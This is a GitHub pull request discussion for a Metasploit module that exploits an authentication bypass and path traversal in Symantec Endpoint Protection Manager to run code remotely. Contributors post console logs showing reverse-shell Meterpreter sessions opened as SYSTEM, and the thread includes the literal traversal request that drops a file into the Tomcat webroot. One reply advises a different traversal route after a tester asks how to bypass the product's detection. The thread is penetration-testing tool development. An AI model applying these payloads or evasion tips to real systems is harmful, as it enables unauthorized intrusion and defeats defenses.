New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add the Symantec Endpoint Protection Manager auth bypass rce module #5800

Merged
merged 15 commits into from Aug 14, 2015

Conversation

Projects
None yet
6 participants
@brandonprry
Contributor

brandonprry commented Aug 1, 2015

This module exploits an auth bypass and arbitrary file write vuln in order to achieve unauthenticated remote code execution to drop and execute a meterpreter shell onto the box. The vulnerabilities are detailed here:
http://codewhitesec.blogspot.com/2015/07/symantec-endpoint-protection.html

The trial available on the web is still vulnerable:

https://www4.symantec.com/Vrt/offer?a_id=77956

If for some reason this doesn't work, I have a vulnerable copy. Tested on Windows Server 2008.

msf exploit(sepm_auth_bypass_rce) > show options

Module options (exploit/windows/http/sepm_auth_bypass_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.1.18     yes       The target address
   RPORT      8443             yes       The target port
   SSL        true             yes       Use SSL
   TARGETURI  /                yes       The path of the web application
   VHOST                       no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: , , seh, thread, process, none)
   LHOST     192.168.1.45     yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(sepm_auth_bypass_rce) > exploit

[*] Started reverse handler on 192.168.1.45:4444 
[*] Sending stage (885806 bytes) to 192.168.1.18
[*] Meterpreter session 3 opened (192.168.1.45:4444 -> 192.168.1.18:49614) at 2015-08-01 16:42:43 -0500

meterpreter > getuid
Server username: NT SERVICE\semsrv
meterpreter > 
@brandonprry

This comment has been minimized.

Show comment
Hide comment
@brandonprry

brandonprry Aug 1, 2015

Contributor

Oh, I need to randomize the filenames.

I am not sure how to make this work with the Filedropper mixing though.

Contributor

brandonprry commented Aug 1, 2015

Oh, I need to randomize the filenames.

I am not sure how to make this work with the Filedropper mixing though.

@Meatballs1

This comment has been minimized.

Show comment
Hide comment
@Meatballs1

Meatballs1 Aug 1, 2015

Contributor

It would just be register_files_for_cleanup(path1, path2) but you don't know the full path. Plus you cant delete the exe whilst its running on WIndows anyway.

No Java target? :)
Or could do a Powershell target also ;)

Contributor

Meatballs1 commented Aug 1, 2015

It would just be register_files_for_cleanup(path1, path2) but you don't know the full path. Plus you cant delete the exe whilst its running on WIndows anyway.

No Java target? :)
Or could do a Powershell target also ;)

@brandonprry

This comment has been minimized.

Show comment
Hide comment
@brandonprry

brandonprry Aug 1, 2015

Contributor

I am not sure if I can upload a JAR, can we do JSP?

Contributor

brandonprry commented Aug 1, 2015

I am not sure if I can upload a JAR, can we do JSP?

@Meatballs1

This comment has been minimized.

Show comment
Hide comment
@Meatballs1

Meatballs1 Aug 1, 2015

Contributor

There is a .to_jsp_war method just drops a binary which isn't much use. Although you could hijack it to drop a JAR?

There are a couple of JSP payloads for a bind tcp command shell and reverse tcp

Contributor

Meatballs1 commented Aug 1, 2015

There is a .to_jsp_war method just drops a binary which isn't much use. Although you could hijack it to drop a JAR?

There are a couple of JSP payloads for a bind tcp command shell and reverse tcp

@brandonprry

This comment has been minimized.

Show comment
Hide comment
@brandonprry

brandonprry Aug 1, 2015

Contributor

I definitely prefer having a meterp shell out of the gate, but if consensus is a preferred JSP command shell, can make this work.

Have putt putt here soon, so will have to make any updates related to that tomorrow.

Contributor

brandonprry commented Aug 1, 2015

I definitely prefer having a meterp shell out of the gate, but if consensus is a preferred JSP command shell, can make this work.

Have putt putt here soon, so will have to make any updates related to that tomorrow.

@Meatballs1

This comment has been minimized.

Show comment
Hide comment
@Meatballs1

Meatballs1 Aug 1, 2015

Contributor

Meterpreter is always the nicest, but say there is restrictive whitelisting on the host you could execute a JSP/Jar file at least.

Contributor

Meatballs1 commented Aug 1, 2015

Meterpreter is always the nicest, but say there is restrictive whitelisting on the host you could execute a JSP/Jar file at least.

@brandonprry

This comment has been minimized.

Show comment
Hide comment
@brandonprry

brandonprry Aug 1, 2015

Contributor

Maybe the default target could upload meterp, then a second available for pure JSP.

Contributor

brandonprry commented Aug 1, 2015

Maybe the default target could upload meterp, then a second available for pure JSP.

@brandonprry

This comment has been minimized.

Show comment
Hide comment
@brandonprry

brandonprry Aug 1, 2015

Contributor

I was under the impression tomcat would need to be restarted before a JAR would work, but might be wrong, didn't try.

Contributor

brandonprry commented Aug 1, 2015

I was under the impression tomcat would need to be restarted before a JAR would work, but might be wrong, didn't try.

@mwulftange

View changes

Show outdated Hide outdated modules/exploits/windows/http/sepm_auth_bypass_rce.rb
@mwulftange

View changes

Show outdated Hide outdated modules/exploits/windows/http/sepm_auth_bypass_rce.rb
@brandonprry

This comment has been minimized.

Show comment
Hide comment
@brandonprry

brandonprry Aug 2, 2015

Contributor

Thanks for the feedback Markus. Both of these have been resolved. Great vulns man, thanks for sharing. :)

Contributor

brandonprry commented Aug 2, 2015

Thanks for the feedback Markus. Both of these have been resolved. Great vulns man, thanks for sharing. :)

@brandonprry

This comment has been minimized.

Show comment
Hide comment
@brandonprry

brandonprry Aug 2, 2015

Contributor
msf exploit(sepm_auth_bypass_rce) > show options

Module options (exploit/windows/http/sepm_auth_bypass_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.1.18     yes       The target address
   RPORT      8443             yes       The target port
   SSL        true             yes       Use SSL
   TARGETURI  /                yes       The path of the web application
   VHOST                       no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: , , seh, thread, process, none)
   LHOST     192.168.1.45     yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(sepm_auth_bypass_rce) > exploit

[*] Started reverse handler on 192.168.1.45:4444 
[*] Sending stage (885806 bytes) to 192.168.1.18
[*] Meterpreter session 9 opened (192.168.1.45:4444 -> 192.168.1.18:57812) at 2015-08-02 08:32:19 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 
Contributor

brandonprry commented Aug 2, 2015

msf exploit(sepm_auth_bypass_rce) > show options

Module options (exploit/windows/http/sepm_auth_bypass_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.1.18     yes       The target address
   RPORT      8443             yes       The target port
   SSL        true             yes       Use SSL
   TARGETURI  /                yes       The path of the web application
   VHOST                       no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: , , seh, thread, process, none)
   LHOST     192.168.1.45     yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(sepm_auth_bypass_rce) > exploit

[*] Started reverse handler on 192.168.1.45:4444 
[*] Sending stage (885806 bytes) to 192.168.1.18
[*] Meterpreter session 9 opened (192.168.1.45:4444 -> 192.168.1.18:57812) at 2015-08-02 08:32:19 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 
@mwulftange

View changes

Show outdated Hide outdated modules/exploits/windows/http/sepm_auth_bypass_rce.rb
@mwulftange

This comment has been minimized.

Show comment
Hide comment
@mwulftange

mwulftange Aug 2, 2015

Contributor

A cleanup afterwards would be nice.

Contributor

mwulftange commented Aug 2, 2015

A cleanup afterwards would be nice.

@brandonprry

This comment has been minimized.

Show comment
Hide comment
@brandonprry

brandonprry Aug 2, 2015

Contributor

Yeah, I mentioned earlier that I wasn't sure the best way to use FileDropper in this. I might could clean up the script which executes the meterp shell, but I don't think I can clean up the actual binary dropped.

Contributor

brandonprry commented Aug 2, 2015

Yeah, I mentioned earlier that I wasn't sure the best way to use FileDropper in this. I might could clean up the script which executes the meterp shell, but I don't think I can clean up the actual binary dropped.

@brandonprry

This comment has been minimized.

Show comment
Hide comment
@brandonprry

brandonprry Aug 2, 2015

Contributor

Have church, will need to pick this back up later this afternoon.

Contributor

brandonprry commented Aug 2, 2015

Have church, will need to pick this back up later this afternoon.

@mwulftange

View changes

Show outdated Hide outdated modules/exploits/windows/http/sepm_auth_bypass_rce.rb
@mwulftange

View changes

Show outdated Hide outdated modules/exploits/windows/http/sepm_auth_bypass_rce.rb
'Targets' =>
[
[ 'Automatic', {
'Arch' => ARCH_X86,

This comment has been minimized.

@mwulftange

mwulftange Aug 2, 2015

Contributor

What about 64-bit Windows?

@mwulftange

mwulftange Aug 2, 2015

Contributor

What about 64-bit Windows?

This comment has been minimized.

@brandonprry

brandonprry Aug 2, 2015

Contributor

There are a couple targets it looks like I can add. One for a pure JSP payload for a command shell and a 64 bit one.

Sent from a phone

On Aug 2, 2015, at 9:15 AM, Markus Wulftange notifications@github.com wrote:

In modules/exploits/windows/http/sepm_auth_bypass_rce.rb:

  •      'bperry', #metasploit module
    
  •      'Markus Wulftange' #discovery
    
  •    ],
    
  •  'References'     =>
    
  •    [
    
  •      ['CVE', '2015-1486'],
    
  •      ['CVE', '2015-1487'],
    
  •      ['CVE', '2015-1489'],
    
  •      ['URL', 'http://codewhitesec.blogspot.com/2015/07/symantec-endpoint-protection.html']
    
  •    ],
    
  •  'Payload'        => { 'BadChars' => "\x0d\x0a\x00" },
    
  •  'Platform'       => 'win',
    
  •  'Targets'        =>
    
  •    [
    
  •      [ 'Automatic', {
    
  •        'Arch' => ARCH_X86,
    
    What about 64-bit Windows?


Reply to this email directly or view it on GitHub.

@brandonprry

brandonprry Aug 2, 2015

Contributor

There are a couple targets it looks like I can add. One for a pure JSP payload for a command shell and a 64 bit one.

Sent from a phone

On Aug 2, 2015, at 9:15 AM, Markus Wulftange notifications@github.com wrote:

In modules/exploits/windows/http/sepm_auth_bypass_rce.rb:

  •      'bperry', #metasploit module
    
  •      'Markus Wulftange' #discovery
    
  •    ],
    
  •  'References'     =>
    
  •    [
    
  •      ['CVE', '2015-1486'],
    
  •      ['CVE', '2015-1487'],
    
  •      ['CVE', '2015-1489'],
    
  •      ['URL', 'http://codewhitesec.blogspot.com/2015/07/symantec-endpoint-protection.html']
    
  •    ],
    
  •  'Payload'        => { 'BadChars' => "\x0d\x0a\x00" },
    
  •  'Platform'       => 'win',
    
  •  'Targets'        =>
    
  •    [
    
  •      [ 'Automatic', {
    
  •        'Arch' => ARCH_X86,
    
    What about 64-bit Windows?


Reply to this email directly or view it on GitHub.

@brandonprry

This comment has been minimized.

Show comment
Hide comment
@brandonprry

brandonprry Aug 2, 2015

Contributor

Adding a 64-bit target, not sure this will work. The SEPM process is 32-bit.

Contributor

brandonprry commented Aug 2, 2015

Adding a 64-bit target, not sure this will work. The SEPM process is 32-bit.

@brandonprry

This comment has been minimized.

Show comment
Hide comment
@brandonprry

brandonprry Aug 2, 2015

Contributor

And FWIW I am testing against 64-bit Windows.

Contributor

brandonprry commented Aug 2, 2015

And FWIW I am testing against 64-bit Windows.

@brandonprry

This comment has been minimized.

Show comment
Hide comment
@brandonprry

brandonprry Aug 2, 2015

Contributor

The meterp binary cannot be deleted while the shell is open, so that won't be able to be cleaned up. Working on seeing if I can clean up the JSP file that is uploaded.

Contributor

brandonprry commented Aug 2, 2015

The meterp binary cannot be deleted while the shell is open, so that won't be able to be cleaned up. Working on seeing if I can clean up the JSP file that is uploaded.

@brandonprry

This comment has been minimized.

Show comment
Hide comment
@brandonprry

brandonprry Aug 2, 2015

Contributor

Looks like neither of the files can be deleted. The JSP is currently being parsed when the execution of the meterp binary is performed to create the shell. The JSP can't delete itself while it is open and being executed/parsed.

Open to other ideas though.

Contributor

brandonprry commented Aug 2, 2015

Looks like neither of the files can be deleted. The JSP is currently being parsed when the execution of the meterp binary is performed to create the shell. The JSP can't delete itself while it is open and being executed/parsed.

Open to other ideas though.

@brandonprry

This comment has been minimized.

Show comment
Hide comment
@brandonprry

brandonprry Aug 2, 2015

Contributor

One thing to note is I am not sure how a patched version behaves. Is a cookie not returned by the Forgot Password functionality?

Contributor

brandonprry commented Aug 2, 2015

One thing to note is I am not sure how a patched version behaves. Is a cookie not returned by the Forgot Password functionality?

@brandonprry

This comment has been minimized.

Show comment
Hide comment
@brandonprry

brandonprry Aug 2, 2015

Contributor

@Meatballs1 I am not sure exactly what you mean by hijacking to_jsp_war for this.

Contributor

brandonprry commented Aug 2, 2015

@Meatballs1 I am not sure exactly what you mean by hijacking to_jsp_war for this.

@mwulftange

This comment has been minimized.

Show comment
Hide comment
@mwulftange

mwulftange Aug 3, 2015

Contributor

Regarding the response of a fixed version: You'll get a JSESSIONID cookie in any case. But in the fixed version, the returned ReportingInfo within the response does not contain the session ID.

Contributor

mwulftange commented Aug 3, 2015

Regarding the response of a fixed version: You'll get a JSESSIONID cookie in any case. But in the fixed version, the returned ReportingInfo within the response does not contain the session ID.

@brandonprry

This comment has been minimized.

Show comment
Hide comment
@brandonprry

brandonprry Aug 3, 2015

Contributor

Thanks, I will look at making a check method this evening after work which looks for the session ID in the response to determine if the given instance is vulnerable or not.

Contributor

brandonprry commented Aug 3, 2015

Thanks, I will look at making a check method this evening after work which looks for the session ID in the response to determine if the given instance is vulnerable or not.

@ihacku

This comment has been minimized.

Show comment
Hide comment
@ihacku

ihacku Aug 4, 2015

Depending on the http response code is 200 or not is not precise,
during my test, if the ResponseCode="0", then you successfully pwned SEPM.
But if the ResponseCode=303300693, for unknown reason, the upload actually failed.
Maybe @mwulftange know what this ResponseCode means?

ihacku commented Aug 4, 2015

Depending on the http response code is 200 or not is not precise,
during my test, if the ResponseCode="0", then you successfully pwned SEPM.
But if the ResponseCode=303300693, for unknown reason, the upload actually failed.
Maybe @mwulftange know what this ResponseCode means?

@mwulftange

This comment has been minimized.

Show comment
Hide comment
@mwulftange

mwulftange Aug 4, 2015

Contributor

@ihacku The ResetPassword does always return a 200. You have to look at the ResponseCode in the returned XML.

But it only tells you whether the action was successfully performed. For example, on my test box, the response code is always -2130181964 because I have no SMTP configured and thus email delivery fails. But I still get a valid session. ;)

But the Session attribute in the inner XML in the response is a good indicator. Alternatively, you could also trigger an action type that only an admin is authorized to, for example the ReplicationStatus.

The ResponseCode 303300693 means that the Action parameter is missing.

Contributor

mwulftange commented Aug 4, 2015

@ihacku The ResetPassword does always return a 200. You have to look at the ResponseCode in the returned XML.

But it only tells you whether the action was successfully performed. For example, on my test box, the response code is always -2130181964 because I have no SMTP configured and thus email delivery fails. But I still get a valid session. ;)

But the Session attribute in the inner XML in the response is a good indicator. Alternatively, you could also trigger an action type that only an admin is authorized to, for example the ReplicationStatus.

The ResponseCode 303300693 means that the Action parameter is missing.

@ihacku

This comment has been minimized.

Show comment
Hide comment
@ihacku

ihacku Aug 4, 2015

OK, finally know why I can't get shell uploaded in pentest env.
The payload

servlet/ConsoleServlet?ActionType=BinaryFile&Action=UploadPackage&PackageFile=../../../tomcat/webapps/ROOT/1.txt&KnownHosts=.

have been identited as CVE-2015-1487 by SEP, is there anyway we can bypass this?

ihacku commented Aug 4, 2015

OK, finally know why I can't get shell uploaded in pentest env.
The payload

servlet/ConsoleServlet?ActionType=BinaryFile&Action=UploadPackage&PackageFile=../../../tomcat/webapps/ROOT/1.txt&KnownHosts=.

have been identited as CVE-2015-1487 by SEP, is there anyway we can bypass this?

@mwulftange

This comment has been minimized.

Show comment
Hide comment
@mwulftange

mwulftange Aug 4, 2015

Contributor

@ihacku Quite interesting. Do you know the pattern they are looking for?

Contributor

mwulftange commented Aug 4, 2015

@ihacku Quite interesting. Do you know the pattern they are looking for?

@brandonprry

This comment has been minimized.

Show comment
Hide comment
@brandonprry

brandonprry Aug 4, 2015

Contributor

Probably the path traversal is what it is catching on.

Contributor

brandonprry commented Aug 4, 2015

Probably the path traversal is what it is catching on.

@hdm

This comment has been minimized.

Show comment
Hide comment
@hdm

hdm Aug 4, 2015

Contributor

👍

Contributor

hdm commented Aug 4, 2015

👍

@mwulftange

This comment has been minimized.

Show comment
Hide comment
@mwulftange

mwulftange Aug 5, 2015

Contributor

@ihacku Well, there is another path traversal when uploading a new client installation package via the web interface. When the uploaded ZIP is extracted, entries with a name like ..\..\hello.jsp allow traversing.

Contributor

mwulftange commented Aug 5, 2015

@ihacku Well, there is another path traversal when uploading a new client installation package via the web interface. When the uploaded ZIP is extracted, entries with a name like ..\..\hello.jsp allow traversing.

@jvazquez-r7 jvazquez-r7 self-assigned this Aug 14, 2015

@jvazquez-r7

This comment has been minimized.

Show comment
Hide comment
@jvazquez-r7

jvazquez-r7 Aug 14, 2015

Contributor

Did a first test against windows and ran smoothly:

msf exploit(sepm_auth_bypass_rce) > set rhost 172.16.158.135
rhost => 172.16.158.135
msf exploit(sepm_auth_bypass_rce) > run

[*] Started reverse handler on 172.16.158.1:4444
[*] Getting cookie
[*] Uploading payload...
[*] Uploading JSP page to execute the payload...
[*] Executing payload. Manual cleanup will be required.
[*] Sending stage (885806 bytes) to 172.16.158.135
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.135:1090) at 2015-08-14 16:46:34 -0500


meterpreter >
meterpreter > getuid
sServer username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : JUAN-6ED9DB6CA8
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.158.135 - Meterpreter session 1 closed.  Reason: User exit
Contributor

jvazquez-r7 commented Aug 14, 2015

Did a first test against windows and ran smoothly:

msf exploit(sepm_auth_bypass_rce) > set rhost 172.16.158.135
rhost => 172.16.158.135
msf exploit(sepm_auth_bypass_rce) > run

[*] Started reverse handler on 172.16.158.1:4444
[*] Getting cookie
[*] Uploading payload...
[*] Uploading JSP page to execute the payload...
[*] Executing payload. Manual cleanup will be required.
[*] Sending stage (885806 bytes) to 172.16.158.135
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.135:1090) at 2015-08-14 16:46:34 -0500


meterpreter >
meterpreter > getuid
sServer username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : JUAN-6ED9DB6CA8
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.158.135 - Meterpreter session 1 closed.  Reason: User exit

@jvazquez-r7 jvazquez-r7 merged commit 74ed8cf into rapid7:master Aug 14, 2015

1 check passed

continuous-integration/travis-ci/pr The Travis CI build passed
Details

jvazquez-r7 added a commit that referenced this pull request Aug 14, 2015

@jvazquez-r7

This comment has been minimized.

Show comment
Hide comment
@jvazquez-r7

jvazquez-r7 Aug 14, 2015

Contributor

Landed after some cleanup and including FileDropper, see final result here: c02df6b

Test after changes:

msf exploit(sepm_auth_bypass_rce) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.135:8443 - Getting cookie...
[*] 172.16.158.135:8443 - Uploading payload...
[*] 172.16.158.135:8443 - Uploading JSP page to execute the payload...
[*] 172.16.158.135:8443 - Executing payload. Manual cleanup will be required.
[*] Sending stage (885806 bytes) to 172.16.158.135
[*] Meterpreter session 4 opened (172.16.158.1:4444 -> 172.16.158.135:1206) at 2015-08-14 16:59:16 -0500
[+] Deleted ../tomcat/webapps/ROOT/yYkgAFrSlR.jsp
[!] This exploit may require manual cleanup of '../tomcat/webapps/ROOT/BtzQfuHRyM.exe' on the target

Thanks @brandonprry !

Contributor

jvazquez-r7 commented Aug 14, 2015

Landed after some cleanup and including FileDropper, see final result here: c02df6b

Test after changes:

msf exploit(sepm_auth_bypass_rce) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.135:8443 - Getting cookie...
[*] 172.16.158.135:8443 - Uploading payload...
[*] 172.16.158.135:8443 - Uploading JSP page to execute the payload...
[*] 172.16.158.135:8443 - Executing payload. Manual cleanup will be required.
[*] Sending stage (885806 bytes) to 172.16.158.135
[*] Meterpreter session 4 opened (172.16.158.1:4444 -> 172.16.158.135:1206) at 2015-08-14 16:59:16 -0500
[+] Deleted ../tomcat/webapps/ROOT/yYkgAFrSlR.jsp
[!] This exploit may require manual cleanup of '../tomcat/webapps/ROOT/BtzQfuHRyM.exe' on the target

Thanks @brandonprry !

@brandonprry

This comment has been minimized.

Show comment
Hide comment
@brandonprry

brandonprry Aug 14, 2015

Contributor

Nice! Thanks a bunch dude

On Aug 14, 2015, at 5:05 PM, Juan Vazquez notifications@github.com wrote:

Merged #5800 #5800.


Reply to this email directly or view it on GitHub #5800 (comment).

Contributor

brandonprry commented Aug 14, 2015

Nice! Thanks a bunch dude

On Aug 14, 2015, at 5:05 PM, Juan Vazquez notifications@github.com wrote:

Merged #5800 #5800.


Reply to this email directly or view it on GitHub #5800 (comment).

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment